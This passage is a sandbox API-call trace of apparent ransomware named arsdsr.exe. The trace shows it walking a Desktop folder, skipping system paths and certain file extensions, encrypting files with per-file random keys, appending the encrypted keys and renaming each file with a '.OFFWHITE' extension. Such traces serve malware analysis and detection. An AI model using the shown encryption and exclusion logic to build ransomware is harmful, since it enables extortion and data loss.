HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\hVFTUWDO.mp3" [0132.547] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.547] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.547] PathFindExtensionW (pszPath="hVFTUWDO.mp3") returned=".mp3" [0132.547] lstrcmpiW (lpString1=".mp3", lpString2=".exe") returned 1 [0132.547] lstrcmpiW (lpString1=".mp3", lpString2=".log") returned 1 [0132.547] lstrcmpiW (lpString1=".mp3", lpString2=".cab") returned 1 [0132.547] lstrcmpiW (lpString1=".mp3", lpString2=".cmd") returned 1 [0132.547] lstrcmpiW (lpString1=".mp3", lpString2=".com") returned 1 [0132.547] lstrcmpiW (lpString1=".mp3", lpString2=".cpl") returned 1 [0132.547] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0132.547] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0132.547] lstrcmpiW (lpString1=".mp3", lpString2=".url") returned -1 [0132.547] lstrcmpiW (lpString1=".mp3", lpString2=".ttf") returned -1 [0132.547] lstrcmpiW (lpString1=".mp3", lpString2=".mp3") returned 0 [0132.547] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcab2d9c0, ftCreationTime.dwHighDateTime=0x1d5dfae, ftLastAccessTime.dwLowDateTime=0xb3ff2dd0, ftLastAccessTime.dwHighDateTime=0x1d5d7c2, ftLastWriteTime.dwLowDateTime=0xb3ff2dd0, ftLastWriteTime.dwHighDateTime=0x1d5d7c2, nFileSizeHigh=0x0, nFileSizeLow=0xf3de, dwReserved0=0x295debc, dwReserved1=0xe84b75dd, cFileName="lD1nXuqIF.avi", cAlternateFileName="LD1NXU~1.AVI")) returned 1 [0132.547] lstrcmpiW (lpString1="lD1nXuqIF.avi", lpString2=".") returned 1 [0132.547] lstrcmpiW (lpString1="lD1nXuqIF.avi", lpString2="..") returned 1 [0132.547] lstrcmpiW (lpString1="lD1nXuqIF.avi", lpString2="...") returned 1 [0132.547] lstrcmpiW (lpString1="lD1nXuqIF.avi", lpString2="windows") returned -1 [0132.547] lstrcmpiW (lpString1="lD1nXuqIF.avi", lpString2="$recycle.bin") returned 1 [0132.548] lstrcmpiW (lpString1="lD1nXuqIF.avi", lpString2="rsa") returned -1 [0132.548] lstrcmpiW (lpString1="lD1nXuqIF.avi", lpString2="ntuser.dat") returned -1 [0132.548] lstrcmpiW (lpString1="lD1nXuqIF.avi", lpString2="programdata") returned -1 [0132.548] lstrcmpiW (lpString1="lD1nXuqIF.avi", lpString2="appdata") returned 1 [0132.548] lstrcmpiW (lpString1="lD1nXuqIF.avi", lpString2="program files") returned -1 [0132.548] lstrcmpiW (lpString1="lD1nXuqIF.avi", lpString2="program files (x86)") returned -1 [0132.548] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\" [0132.548] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\", lpString2="lD1nXuqIF.avi" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\lD1nXuqIF.avi") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\lD1nXuqIF.avi" [0132.548] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.548] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.548] PathFindExtensionW (pszPath="lD1nXuqIF.avi") returned=".avi" [0132.548] lstrcmpiW (lpString1=".avi", lpString2=".exe") returned -1 [0132.548] lstrcmpiW (lpString1=".avi", lpString2=".log") returned -1 [0132.548] lstrcmpiW (lpString1=".avi", lpString2=".cab") returned -1 [0132.548] lstrcmpiW (lpString1=".avi", lpString2=".cmd") returned -1 [0132.548] lstrcmpiW (lpString1=".avi", lpString2=".com") returned -1 [0132.548] lstrcmpiW (lpString1=".avi", lpString2=".cpl") returned -1 [0132.548] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0132.548] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0132.549] lstrcmpiW (lpString1=".avi", lpString2=".url") returned -1 [0132.549] lstrcmpiW (lpString1=".avi", lpString2=".ttf") returned -1 [0132.549] lstrcmpiW (lpString1=".avi", lpString2=".mp3") returned -1 [0132.549] lstrcmpiW (lpString1=".avi", lpString2=".pif") returned -1 [0132.549] lstrcmpiW (lpString1=".avi", lpString2=".mp4") returned -1 [0132.549] lstrcmpiW (lpString1=".avi", lpString2=".OFFWHITE") returned -1 [0132.549] lstrcmpiW (lpString1=".avi", lpString2=".msi") returned -1 [0132.549] lstrcmpiW (lpString1="lD1nXuqIF.avi", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.549] GetProcessHeap () returned 0x500000 [0132.549] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f548 [0132.549] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\lD1nXuqIF.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_6fhsskgxaaf_3ovs\\ld1nxuqif.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0132.551] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=62430) returned 1 [0132.551] GetProcessHeap () returned 0x500000 [0132.551] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.551] GetProcessHeap () returned 0x500000 [0132.552] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.553] GetProcessHeap () returned 0x500000 [0132.553] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.553] GetProcessHeap () returned 0x500000 [0132.553] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.553] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.553] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.553] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.553] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.553] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.553] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.553] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.553] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.553] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295dc90*=0x100) returned 1 [0132.554] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.554] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.554] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0132.554] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xf3de, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.554] SetLastError (dwErrCode=0x0) [0132.554] WriteFile (in: hFile=0x21c, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.621] GetLastError () returned 0x0 [0132.621] GetLastError () returned 0x0 [0132.621] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xf4de, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.621] WriteFile (in: hFile=0x21c, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.621] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xf5de, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.621] WriteFile (in: hFile=0x21c, lpBuffer=0x53f548*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x53f548*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0132.621] GetProcessHeap () returned 0x500000 [0132.621] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xf3de) returned 0x5587b8 [0132.621] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.621] ReadFile (in: hFile=0x21c, lpBuffer=0x5587b8, nNumberOfBytesToRead=0xf3de, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x5587b8*, lpNumberOfBytesRead=0x295dec0*=0xf3de, lpOverlapped=0x0) returned 1 [0132.626] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.627] WriteFile (in: hFile=0x21c, lpBuffer=0x5587b8*, nNumberOfBytesToWrite=0xf3de, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5587b8*, lpNumberOfBytesWritten=0x295decc*=0xf3de, lpOverlapped=0x0) returned 1 [0132.627] GetProcessHeap () returned 0x500000 [0132.627] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5587b8 | out: hHeap=0x500000) returned 1 [0132.627] CloseHandle (hObject=0x21c) returned 1 [0132.633] GetProcessHeap () returned 0x500000 [0132.634] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.634] GetProcessHeap () returned 0x500000 [0132.634] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.634] GetProcessHeap () returned 0x500000 [0132.634] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.634] GetProcessHeap () returned 0x500000 [0132.634] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.634] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\lD1nXuqIF.avi" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\lD1nXuqIF.avi") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\lD1nXuqIF.avi" [0132.634] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\lD1nXuqIF.avi", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\lD1nXuqIF.avi.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\lD1nXuqIF.avi.OFFWHITE" [0132.634] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\lD1nXuqIF.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_6fhsskgxaaf_3ovs\\ld1nxuqif.avi"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\lD1nXuqIF.avi.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_6fhsskgxaaf_3ovs\\ld1nxuqif.avi.offwhite")) returned 1 [0132.635] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40390590, ftCreationTime.dwHighDateTime=0x1d5e3cc, ftLastAccessTime.dwLowDateTime=0xf58a4eb0, ftLastAccessTime.dwHighDateTime=0x1d5e082, ftLastWriteTime.dwLowDateTime=0xf58a4eb0, ftLastWriteTime.dwHighDateTime=0x1d5e082, nFileSizeHigh=0x0, nFileSizeLow=0x176a3, dwReserved0=0x295debc, dwReserved1=0xe84b75dd, cFileName="pLTpKKda0j9zNUYoUNt.csv", cAlternateFileName="PLTPKK~1.CSV")) returned 1 [0132.635] lstrcmpiW (lpString1="pLTpKKda0j9zNUYoUNt.csv", lpString2=".") returned 1 [0132.635] lstrcmpiW (lpString1="pLTpKKda0j9zNUYoUNt.csv", lpString2="..") returned 1 [0132.635] lstrcmpiW (lpString1="pLTpKKda0j9zNUYoUNt.csv", lpString2="...") returned 1 [0132.635] lstrcmpiW (lpString1="pLTpKKda0j9zNUYoUNt.csv", lpString2="windows") returned -1 [0132.635] lstrcmpiW (lpString1="pLTpKKda0j9zNUYoUNt.csv", lpString2="$recycle.bin") returned 1 [0132.635] lstrcmpiW (lpString1="pLTpKKda0j9zNUYoUNt.csv", lpString2="rsa") returned -1 [0132.635] lstrcmpiW (lpString1="pLTpKKda0j9zNUYoUNt.csv", lpString2="ntuser.dat") returned 1 [0132.636] lstrcmpiW (lpString1="pLTpKKda0j9zNUYoUNt.csv", lpString2="programdata") returned -1 [0132.636] lstrcmpiW (lpString1="pLTpKKda0j9zNUYoUNt.csv", lpString2="appdata") returned 1 [0132.636] lstrcmpiW (lpString1="pLTpKKda0j9zNUYoUNt.csv", lpString2="program files") returned -1 [0132.636] lstrcmpiW (lpString1="pLTpKKda0j9zNUYoUNt.csv", lpString2="program files (x86)") returned -1 [0132.636] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\" [0132.636] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\", lpString2="pLTpKKda0j9zNUYoUNt.csv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\pLTpKKda0j9zNUYoUNt.csv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\pLTpKKda0j9zNUYoUNt.csv" [0132.636] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.636] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.636] PathFindExtensionW (pszPath="pLTpKKda0j9zNUYoUNt.csv") returned=".csv" [0132.636] lstrcmpiW (lpString1=".csv", lpString2=".exe") returned -1 [0132.636] lstrcmpiW (lpString1=".csv", lpString2=".log") returned -1 [0132.636] lstrcmpiW (lpString1=".csv", lpString2=".cab") returned 1 [0132.636] lstrcmpiW (lpString1=".csv", lpString2=".cmd") returned 1 [0132.636] lstrcmpiW (lpString1=".csv", lpString2=".com") returned 1 [0132.636] lstrcmpiW (lpString1=".csv", lpString2=".cpl") returned 1 [0132.636] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1 [0132.636] lstrcmpiW (lpString1=".csv", lpString2=".dll") returned -1 [0132.636] lstrcmpiW (lpString1=".csv", lpString2=".url") returned -1 [0132.636] lstrcmpiW (lpString1=".csv", lpString2=".ttf") returned -1 [0132.636] lstrcmpiW (lpString1=".csv", lpString2=".mp3") returned -1 [0132.636] lstrcmpiW (lpString1=".csv", lpString2=".pif") returned -1 [0132.636] lstrcmpiW (lpString1=".csv", lpString2=".mp4") returned -1 [0132.636] lstrcmpiW (lpString1=".csv", lpString2=".OFFWHITE") returned -1 [0132.636] lstrcmpiW (lpString1=".csv", lpString2=".msi") returned -1 [0132.637] lstrcmpiW (lpString1="pLTpKKda0j9zNUYoUNt.csv", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0132.637] GetProcessHeap () returned 0x500000 [0132.637] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f558 [0132.637] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\pLTpKKda0j9zNUYoUNt.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_6fhsskgxaaf_3ovs\\pltpkkda0j9znuyount.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0132.638] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=95907) returned 1 [0132.638] GetProcessHeap () returned 0x500000 [0132.638] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.638] GetProcessHeap () returned 0x500000 [0132.638] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.638] GetProcessHeap () returned 0x500000 [0132.638] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.638] GetProcessHeap () returned 0x500000 [0132.638] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.638] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.638] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.638] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.638] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.638] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.638] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.638] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.638] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.639] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295dc90*=0x100) returned 1 [0132.639] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.639] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.639] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0132.639] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x176a3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.639] SetLastError (dwErrCode=0x0) [0132.639] WriteFile (in: hFile=0x21c, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.641] GetLastError () returned 0x0 [0132.641] GetLastError () returned 0x0 [0132.641] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x177a3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.641] WriteFile (in: hFile=0x21c, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.642] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x178a3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.642] WriteFile (in: hFile=0x21c, lpBuffer=0x53f558*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x53f558*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0132.642] GetProcessHeap () returned 0x500000 [0132.642] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x176a3) returned 0x55a7b8 [0132.642] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.642] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x176a3, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x176a3, lpOverlapped=0x0) returned 1 [0132.650] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.650] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x176a3, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x176a3, lpOverlapped=0x0) returned 1 [0132.650] GetProcessHeap () returned 0x500000 [0132.650] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0132.650] CloseHandle (hObject=0x21c) returned 1 [0132.657] GetProcessHeap () returned 0x500000 [0132.657] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.658] GetProcessHeap () returned 0x500000 [0132.658] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.658] GetProcessHeap () returned 0x500000 [0132.658] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.658] GetProcessHeap () returned 0x500000 [0132.658] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.658] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\pLTpKKda0j9zNUYoUNt.csv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\pLTpKKda0j9zNUYoUNt.csv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\pLTpKKda0j9zNUYoUNt.csv" [0132.658] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\pLTpKKda0j9zNUYoUNt.csv", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\pLTpKKda0j9zNUYoUNt.csv.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\pLTpKKda0j9zNUYoUNt.csv.OFFWHITE" [0132.658] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\pLTpKKda0j9zNUYoUNt.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_6fhsskgxaaf_3ovs\\pltpkkda0j9znuyount.csv"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\pLTpKKda0j9zNUYoUNt.csv.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_6fhsskgxaaf_3ovs\\pltpkkda0j9znuyount.csv.offwhite")) returned 1 [0132.659] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x379804e0, ftCreationTime.dwHighDateTime=0x1d5dad0, ftLastAccessTime.dwLowDateTime=0x7cbaa500, ftLastAccessTime.dwHighDateTime=0x1d5de59, ftLastWriteTime.dwLowDateTime=0x7cbaa500, ftLastWriteTime.dwHighDateTime=0x1d5de59, nFileSizeHigh=0x0, nFileSizeLow=0x12006, dwReserved0=0x295debc, dwReserved1=0xe84b75dd, cFileName="QkrA8bST.flv", cAlternateFileName="")) returned 1 [0132.659] lstrcmpiW (lpString1="QkrA8bST.flv", lpString2=".") returned 1 [0132.659] lstrcmpiW (lpString1="QkrA8bST.flv", lpString2="..") returned 1 [0132.659] lstrcmpiW (lpString1="QkrA8bST.flv", lpString2="...") returned 1 [0132.659] lstrcmpiW (lpString1="QkrA8bST.flv", lpString2="windows") returned -1 [0132.659] lstrcmpiW (lpString1="QkrA8bST.flv", lpString2="$recycle.bin") returned 1 [0132.659] lstrcmpiW (lpString1="QkrA8bST.flv", lpString2="rsa") returned -1 [0132.659] lstrcmpiW (lpString1="QkrA8bST.flv", lpString2="ntuser.dat") returned 1 [0132.659] lstrcmpiW (lpString1="QkrA8bST.flv", lpString2="programdata") returned 1 [0132.659] lstrcmpiW (lpString1="QkrA8bST.flv", lpString2="appdata") returned 1 [0132.659] lstrcmpiW (lpString1="QkrA8bST.flv", lpString2="program files") returned 1 [0132.659] lstrcmpiW (lpString1="QkrA8bST.flv", lpString2="program files (x86)") returned 1 [0132.660] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\" [0132.660] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\", lpString2="QkrA8bST.flv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\QkrA8bST.flv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\QkrA8bST.flv" [0132.660] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.660] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.660] PathFindExtensionW (pszPath="QkrA8bST.flv") returned=".flv" [0132.660] lstrcmpiW (lpString1=".flv", lpString2=".exe") returned 1 [0132.660] lstrcmpiW (lpString1=".flv", lpString2=".log") returned -1 [0132.660] lstrcmpiW (lpString1=".flv", lpString2=".cab") returned 1 [0132.660] lstrcmpiW (lpString1=".flv", lpString2=".cmd") returned 1 [0132.660] lstrcmpiW (lpString1=".flv", lpString2=".com") returned 1 [0132.660] lstrcmpiW (lpString1=".flv", lpString2=".cpl") returned 1 [0132.660] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0132.660] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0132.660] lstrcmpiW (lpString1=".flv", lpString2=".url") returned -1 [0132.660] lstrcmpiW (lpString1=".flv", lpString2=".ttf") returned -1 [0132.660] lstrcmpiW 